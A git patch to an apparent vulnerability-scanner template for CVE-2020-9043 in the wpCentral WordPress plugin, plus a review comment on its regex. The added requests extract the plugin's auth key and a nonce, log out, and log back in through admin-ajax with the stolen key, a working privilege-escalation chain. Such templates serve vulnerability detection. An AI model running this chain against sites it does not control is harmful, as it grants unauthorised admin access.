From 9aec19a49cdc0f928d1403a069f595f4df2341fe Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 24 Jul 2022 22:51:53 +0530
Subject: [PATCH] Update CVE-2020-9043.yaml
---
 cves/2020/CVE-2020-9043.yaml | 27 ++++++++++++++++++++++++---
 1 file changed, 24 insertions(+), 3 deletions(-)
diff --git a/cves/2020/CVE-2020-9043.yaml b/cves/2020/CVE-2020-9043.yaml
index 6ddff2f9c5..9cba2f9308 100644
--- a/cves/2020/CVE-2020-9043.yaml
+++ b/cves/2020/CVE-2020-9043.yaml
@@ -32,19 +32,40 @@ requests:
 GET /wp-admin/index.php HTTP/1.1
 Host: {{Hostname}}
+ - |
+ GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
+ Host: {{Hostname}}
+
+ redirects: true
+ max-redirects: 2
 cookie-reuse: true
 req-condition: true
 matchers:
 - type: dsl
 dsl:
- - "contains(all_headers_2, 'text/html')"
- - "status_code_2 == 200"
- - "contains(body_2, 'wpCentral Connection Key')"
+ - "contains(all_headers_4, 'text/html')"
+ - "status_code_4 == 200"
+ - "contains(body_4, 'wpCentral Connection Key')"
+ - contains(body_4, "pagenow = \'dashboard\'")
 condition: and
 extractors:
 - type: regex
+ name: authkey
 part: body
 group: 1
 regex:
 - 'style="word-wrap:break-word;">([a-z0-9]+)'
+ internal: true
+
+ - type: regex
+ name: nonce
+ part: body
+ group: 1
+ regex:
+ - '_wpnonce=([0-9a-z]+)'
+ internal: true
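Review bot: The new `nonce` extractor captures the first `_wpnonce=` value it finds in a response body, but WordPress nonces are bound to a specific action, so on an admin page with several nonce-bearing links the captured value may not be the logout one. Request 3 could then stop at the logout confirmation page and the template could miss a vulnerable host. Anchoring the pattern to the logout link, e.g. `- 'action=logout&(?:amp;)?_wpnonce=([0-9a-z]+)'`, would make the capture deterministic. The added matcher `contains(body_4, "pagenow = \'dashboard\'")` is also the only DSL entry left unquoted, so quoting it like its neighbours would keep the list consistent. The `requests:` block begins before this hunk, so the login request and the response these extractors run against are not visible here.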